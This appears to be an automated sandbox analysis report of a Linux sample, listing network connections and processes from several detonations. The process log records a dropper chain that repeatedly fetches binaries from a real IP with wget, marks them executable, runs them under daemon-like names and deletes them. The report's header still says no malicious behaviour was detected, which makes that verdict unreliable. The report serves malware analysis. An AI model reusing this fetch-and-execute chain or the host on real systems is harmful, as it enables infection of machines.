Analysis Overview
SHA256
89636c6b497c8d80ac5043a61296c7b5e4422d1f0b96a414f15d0df5beb16e6c
Threat Level: No (potentially) malicious behavior was detected
The file b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-16 22:10
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:12
Platform
debian9-armhf-20240611-en
Max time network
26s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:10
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:10
Platform
debian9-mipsel-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:12
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
128s
Command Line
Signatures
Processes
/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118
[/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118]
/usr/bin/wget
[wget http://89.203.249.29/ntpd]
/bin/chmod
[chmod +x ntpd]
/tmp/ntpd
[./ntpd]
/bin/rm
[rm -rf ntpd]
/usr/bin/wget
[wget http://89.203.249.29/sshd]
/bin/chmod
[chmod +x sshd]
/tmp/sshd
[./sshd]
/bin/rm
[rm -rf sshd]
/usr/bin/wget
[wget http://89.203.249.29/openssh]
/bin/chmod
[chmod +x openssh]
/tmp/openssh
[./openssh]
/bin/rm
[rm -rf openssh]
/usr/bin/wget
[wget http://89.203.249.29/bash]
/bin/chmod
[chmod +x bash]
/tmp/bash
[./bash]
/bin/rm
[rm -rf bash]
/usr/bin/wget
[wget http://89.203.249.29/tftp]
/bin/chmod
[chmod +x tftp]
/tmp/tftp
[./tftp]
/bin/rm
[rm -rf tftp]
/usr/bin/wget
[wget http://89.203.249.29/wget]
/bin/chmod
[chmod +x wget]
/tmp/wget
[./wget]
/bin/rm
[rm -rf wget]
/usr/bin/wget
[wget http://89.203.249.29/cron]
/bin/chmod
[chmod +x cron]
/tmp/cron
[./cron]
/bin/rm
[rm -rf cron]
/usr/bin/wget
[wget http://89.203.249.29/ftp]
/bin/chmod
[chmod +x ftp]
/tmp/ftp
[./ftp]
/bin/rm
[rm -rf ftp]
/usr/bin/wget
[wget http://89.203.249.29/pftp]
/bin/chmod
[chmod +x pftp]
/tmp/pftp
[./pftp]
/bin/rm
[rm -rf pftp]
/usr/bin/wget
[wget http://89.203.249.29/sh]
/bin/chmod
[chmod +x sh]
/tmp/sh
[./sh]
/bin/rm
[rm -rf sh]
/usr/bin/wget
[wget http://89.203.249.29/[cpu]]
/bin/chmod
[chmod +x [cpu]]
/tmp/[cpu]
[./[cpu]]
/bin/rm
[rm -rf [cpu]]
/usr/bin/wget
[wget http://89.203.249.29/apache2]
/bin/chmod
[chmod +x apache2]
/tmp/apache2
[./apache2]
/bin/rm
[rm -rf apache2]
/usr/bin/wget
[wget http://89.203.249.29/telnetd]
/bin/chmod
[chmod +x telnetd]
/tmp/telnetd
[./telnetd]
/bin/rm
[rm -rf telnetd]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| GB | 195.181.164.19:443 | | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | | tcp |